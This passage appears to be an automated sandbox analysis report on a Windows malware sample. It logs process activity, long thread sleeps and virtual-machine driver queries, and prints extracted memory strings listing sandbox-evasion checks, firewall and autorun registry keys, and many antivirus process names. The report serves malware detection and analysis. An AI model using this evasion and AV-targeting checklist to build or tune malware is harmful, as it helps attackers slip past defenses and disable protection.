                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: CpSHySoEfzH.exe, 9sek3aw7533q9.exe, 0000000E.00000002.266297268.0000000000960000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000000F.00000002.536031324.0000000003740000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000010.00000002.530417104.0000000003DD0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000012.00000002.542937033.0000000003ED0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000014.00000002.544987662.0000000003BD0000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000015.00000002.281228510.0000000002160000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000017.00000002.544278949.0000000004060000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001A.00000002.556445822.0000000004470000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001D.00000002.526598639.0000000004000000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmpBinary or memory string: DIR_WATCH.DLL
                      Source: CpSHySoEfzH.exe, 9sek3aw7533q9.exe, 0000000E.00000002.266297268.0000000000960000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000000F.00000002.536031324.0000000003740000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000010.00000002.530417104.0000000003DD0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000012.00000002.542937033.0000000003ED0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000014.00000002.544987662.0000000003BD0000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000015.00000002.281228510.0000000002160000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000017.00000002.544278949.0000000004060000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001A.00000002.556445822.0000000004470000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001D.00000002.526598639.0000000004000000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: 9sek3aw7533q9.exe, 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmpBinary or memory string: SBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLL%02XEVERYONECURRENT_USER0X%08XSB:0X%08XG:%S_0X%08X_%C:%S_V1$G:%S_0X%08XOPENMSCOREE.DLLSOFTWARE\MICROSOFT\INTERNET EXPLORER\MAINSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONES\%U2500ISOLATIONPMILNOPROTECTEDMODEBANNERYESCHECK_ASSOCIATIONSSOFTWARE\MICROSOFT\INTERNET EXPLORER\MAINIEXPLORE.EXESOFTWARE\CLIENTS\STARTMENUINTERNETIE.HTTPPROGIDSOFTWARE\MICROSOFT\WINDOWS\SHELL\ASSOCIATIONS\URLASSOCIATIONS\HTTP\USERCHOICEIE.HTTPSSOFTWARE\MICROSOFT\WINDOWS\SHELL\ASSOCIATIONS\URLASSOCIATIONS\HTTPS\USERCHOICESOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\FILEEXTS\.HTM\USERCHOICESOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\FILEEXTS\.HTML\USERCHOICEIE.ASSOCFILE.HTMCHROME.EXEFIREFOX.EXEOPERA.EXESAFARI.EXE360BROWSER.EXEMAXTHON.EXESVCVERSIONSOFTWARE\MICROSOFT\INTERNET EXPLORERVERSIONCURRENTVERSIONSOFTWARE\MOZILLA\MOZILLA FIREFOXHTTP\SHELL\OPEN\COMMANDSTART PAGEAPPLICATIONS\IEXPLORE.EXE\SHELL\OPEN\COMMANDIEX(X86)%S\INTERNET EXPLORER\IEXPLORE.EXESOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\%SFLAGSCOOKIE:MOZILLA\FIREFOX\PROFILESCOOKIES.SQLITEERP~DCEN7ZXY~CXE7:7DND~YCREYV{D-7```9DND~YCREYV{D9TXZX[[NSUPDXQC`VERK^ZZBY~CN7^YTPZREZXY~CXE~YP7:7VG^7ZXY~CXE7A%7$%:U~CGEXTZXYH@^YSX@HT[VDDC^SV@~YSX`DNDCRZKTXYCEX{DRC''&KDREA~TRDKS~D|KRYBZAZ`VERAUXODNDCRZKTBEERYCTXYCEX{DRCKDREA~TRDKAZ`VERDXQC@VERKAZ`VER;7^YT90LIBRARYINDOTASKMGR.EXEPROCEXP.EXE\DESKTOPDOCUMENTS%S\WINSXS\X86_MICROSOFT.WINDOWS.COMMON-CONTROLS_*6.0.*_*%S\WINSXS\%S\COMCTL32.DLLK32GETMAPPEDFILENAMEWPSAPI.DLLGETMAPPEDFILENAMEWSYSTEMMANUFACTURERHARDWARE\DESCRIPTION\SYSTEM\BIOSVMWARSYSTEMBIOSVERSIONHARDWARE\DESCRIPTION\SYSTEMVBOXDRIVERSVBOXVIDEO.SYSVBOXGUEST.SYSVMHGFS.SYSPRL_BOOT.SYSJJ8J^QPEJJ8J@TYNQCSEBCMD.EXEPROCESSORNAMESTRINGHARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0DG_SSUDBUSAPPLE MOBILE DEVICESOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION%S\%SDEPLOYMENT.SECURITY.LEVEL=MEDIUM
                      Source: CpSHySoEfzH.exe, 9sek3aw7533q9.exe, 0000000E.00000002.266297268.0000000000960000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000000F.00000002.536031324.0000000003740000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000010.00000002.530417104.0000000003DD0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000012.00000002.542937033.0000000003ED0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000014.00000002.544987662.0000000003BD0000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000015.00000002.281228510.0000000002160000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000017.00000002.544278949.0000000004060000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001A.00000002.556445822.0000000004470000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001D.00000002.526598639.0000000004000000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: CpSHySoEfzH.exe, 9sek3aw7533q9.exe, 0000000E.00000002.266297268.0000000000960000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000000F.00000002.536031324.0000000003740000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000010.00000002.530417104.0000000003DD0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000012.00000002.542937033.0000000003ED0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000014.00000002.544987662.0000000003BD0000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000015.00000002.281228510.0000000002160000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000017.00000002.544278949.0000000004060000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001A.00000002.556445822.0000000004470000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001D.00000002.526598639.0000000004000000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmpBinary or memory string: API_LOG.DLL
                      Source: Documento--SII--33875.exe, 00000002.00000002.236019487.00000000022A0000.00000040.00000001.sdmp, explorer.exe, 00000003.00000002.519183490.0000000002A00000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000005.00000002.551764489.0000000004650000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000007.00000002.545447794.0000000003B70000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000008.00000002.546008227.00000000041D0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000009.00000002.539566697.0000000003B10000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000000A.00000002.530193704.0000000003AD0000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 0000000E.00000002.266297268.0000000000960000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000000F.00000002.536031324.0000000003740000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000010.00000002.530417104.0000000003DD0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000012.00000002.542937033.0000000003ED0000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000014.00000002.544987662.0000000003BD0000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000015.00000002.281228510.0000000002160000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 00000017.00000002.544278949.0000000004060000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001A.00000002.556445822.0000000004470000.00000040.00000001.sdmp, CpSHySoEfzH.exe, 0000001D.00000002.526598639.0000000004000000.00000040.00000001.sdmp, 9sek3aw7533q9.exe, 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmpBinary or memory string: ELEVATION:ADMINISTRATOR!NEW:\DEVICE\HARDDISK0\PARTITION\??\PHYSICALDRIVE0WINE_GET_VERSIONWINE_GET_UNIX_FILE_NAMEPRODUCTID76487-640-1457236-2383776487-337-8429955-2261476487-644-3177037-2351076497-640-6308873-2383555274-640-2673064-2395076487-640-8834005-2319576487-640-0716662-2353576487-644-8648466-2310600426-293-8170032-8514676487-341-5883812-2242076487-OEM-0027453-63796SANDBOXSAND BOXMALWAREMALTESTTEST USERTRANSPARENTENABLEDPOLICYSCOPEDEFAULTLEVELITEMDATADESCRIPTIONSYSTEM\CURRENTCONTROLSET\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\%SSTANDARDPROFILEENABLEFIREWALLPUBLICPROFILESTANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST%S:*:ENABLEDWUAUSERVWSCSVCBITSMPSSVCSHAREDACCESSAVCUF32.DLL.KASPERSKY.COM.DRWEB.COMSYMANTEC.COM.AVAST.COM.AVG.COM.PANDASECURITY.COM.NAI.COMTRENDMICRO.COM.AVIRA.COM.COMODO.COM.SOPHOS.COMKAVDUMPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORERHIDESCAHEALTHTASKBARNONOTIFICATIONRSTRUI.EXESOFTWARE\MICROSOFT\INTERNET EXPLORER\SETUP\%SDONOTALLOWIE1112.0DONOTALLOWIE12WINDEFENDMRTSTUB.EXEMRT.EXERAPPORTMGMTSERVICETR*S*EE*\RA*POR*T\*RAPPORTSETUP.EXEWINDOWS DEFENDER%PROGRAMW6432%%PROGRAMFILES%WINDOWS DEFENDER\MSASCUI.EXEMPCMDRUN.EXEMSMPENG.EXEMPSVC.DLLNISSRV.EXEMSSECES.EXEMSASCUI.EXEMSCMSMPSVCAVG_UIAVGWDAVGUI.EXEAVGIDSAGENT.EXEAVGWDSVC.EXEAVGDIAGEX.EXEAVGMFAPX.EXEAVGUPD.EXEAVGCFGEX.EXEAVGCSRVA.EXE*AVIRAAVGNTANTIVIRSERVICEUPDATE.DLLUPDATERC.DLLUPDATE.EXEUPDRGUI.EXEAVWEBLOADER.EXEAVGNT.EXEAVGUARD.EXEAVSHADOW.EXEAVCENTER.EXEUSRREQ.EXEAVPAVP15.0.0AVP15.0.1K*A*S*P*E*R*Y*\*AVP.EXEAVPUI.EXECCSVCHST.EXESAV INSTALL DIRECTORYSOFTWARE\SYMANTEC\SYMANTEC ENDPOINT PROTECTION\INSTALLEDAPPSNAVNISN360NAVW32.EXENORTON SECURITYSOFTWARE\SYMANTEC\INSTALLEDAPPSSYMANTECNORTONSYMERR.EXE.EXENIS.EXENAV.EXEN360.EXENS.EXE.EXNIS.EXENAV.EXEENDPOINT PROTECTIONNAVWNT.EXECLTLMH.EXEAVAST! ANTIVIRUSAVASTAVASTUI.EXESETUPAVASTUI.EXEAVASTEMUPDATE.EXEAVASTSVC.EXEASHUPD.EXEASHQUICK.EXESCHED.EXEINSTUP.EXEAVASTPROGRAM *\PROGRAM FILES*\*AV*T SOF*ARE\AV*\A*UI.EXEAV*TSVC.EXEAV*T*M*UPD*.EXEAS*PD.EXEAS*UI*K.EXESCH*D.EXESET*P\IN*T*P.EXESET*P\A*BUGR*P*RT.EXE*.EXEWRSA.EXEWRSVCZATRAY.EXEFORCEFIELD.EXEZONEALARMUPDATING.DLLFSHOSTER32.EXEFSHOSTERFSAUA.DLLPSUNMAIN.EXEPSUAMAINPSUNSCAN.DLLPSANUPGMGR.DLLPSUAMAIN.EXEPSANCU.EXESOFTWARE\PANDA SOFTWAREPAVJOBS.EXEAVENGINE.EXEUPGRADER.EXEAD-AWARE SERVICELAVASOFTADAWARESERVICE11ADAWARE.EXEADAWARESERVICE.EXEBULLGUARDBULLGUARD.EXE.MANIFESTBULLGUARDUPDATE.EXEBULLGUARD.EXEBULLGUARDSCANNER.EXEBULLGUARDBHVSCANNER.EXEBULLGUARDUPDATE2.EXEBGSCAN.EXEBGSCANENGINE.DLLRSMGRSVC.MANIFESTUPDATER.EXEBACKUP\RSD\RSSETUP\UPDATER.EXERSTRAY.EXERAVMOND.EXERSMGRSVC.EXERSMAIN.EXEINSTALLPATHSOFTWARE\RISING\RAVRSSCAN.DLLRSTRAY.DLLMBAMSERVICEMBAMGUI.EXEMBAMDOR.EXEMBAM.EXEMBAMSERVICE.EXEMBAMSCHEDULER.EXEPCTSGUI.EXEPCTSAUXS.EXEPCTSSVC.EXEISTRAYUPDATE.EXEUPDATEHLPR.DLLSBAMTRAYSBAMUI.EXESBAMTRAY.EXEDEFINITIONS\VCORE.DLLF-PROT ANTIVIRUS TRAY APPLICATIONUPDATER_CLIENT_MOD.DLLFPROTTRAY.EXEFPWIN.EXESOPHOS AUTOUPDATE MONITORDATA PATH
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeFile opened / queried: VBoxGuest
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened / queried: C:\Windows\SysWOW64\drivers\prl_boot.sys
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened / queried: C:\Windows\SysWOW64\drivers\vmhgfs.sys
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeFile opened / queried: HGFS
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened / queried: C:\Windows\SysWOW64\drivers\vboxguest.sys
                      Source: C:\Windows\SysWOW64\explorer.exeFile opened / queried: C:\Windows\SysWOW64\drivers\vboxvideo.sys
                      Source: C:\Windows\SysWOW64\explorer.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeWindow / User API: threadDelayed 742
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeWindow / User API: threadDelayed 765
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeWindow / User API: threadDelayed 749
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeWindow / User API: threadDelayed 742
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeWindow / User API: threadDelayed 704
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeWindow / User API: threadDelayed 697
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeWindow / User API: threadDelayed 689
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeWindow / User API: threadDelayed 671
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeWindow / User API: threadDelayed 658
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeWindow / User API: threadDelayed 650
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeWindow / User API: threadDelayed 635
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeWindow / User API: threadDelayed 621
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5772
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 476
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6849
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 508
                      Source: C:\Windows\SysWOW64\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\agq5ooig7au.exe
                      Source: C:\Windows\SysWOW64\explorer.exe TID: 2964Thread sleep time: -66500s >= -30000s
                      Source: C:\Windows\SysWOW64\explorer.exe TID: 5764Thread sleep time: -36000s >= -30000s
                      Source: C:\Windows\SysWOW64\explorer.exe TID: 204Thread sleep time: -1380000s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 4624Thread sleep time: -660000s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6012Thread sleep count: 742 > 30
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6012Thread sleep time: -44520s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 4328Thread sleep time: -660000s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 4532Thread sleep count: 765 > 30
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 4532Thread sleep time: -45900s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6008Thread sleep time: -660000s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 996Thread sleep count: 749 > 30
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 996Thread sleep time: -44940s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 4860Thread sleep time: -660000s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 2212Thread sleep count: 742 > 30
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 2212Thread sleep time: -44520s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6408Thread sleep time: -660000s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6392Thread sleep count: 704 > 30
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6392Thread sleep time: -42240s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6456Thread sleep time: -660000s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6416Thread sleep count: 697 > 30
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6416Thread sleep time: -41820s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6532Thread sleep time: -660000s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6460Thread sleep count: 689 > 30
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6460Thread sleep time: -41340s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6632Thread sleep time: -660000s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6588Thread sleep time: -40260s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6724Thread sleep time: -660000s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6672Thread sleep count: 658 > 30
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6672Thread sleep time: -39480s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6956Thread sleep time: -660000s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6852Thread sleep count: 650 > 30
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6852Thread sleep time: -39000s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 7120Thread sleep time: -660000s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 7032Thread sleep count: 635 > 30
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 7032Thread sleep time: -38100s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 980Thread sleep time: -660000s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 7140Thread sleep count: 621 > 30
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 7140Thread sleep time: -37260s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6760Thread sleep count: 5772 > 30
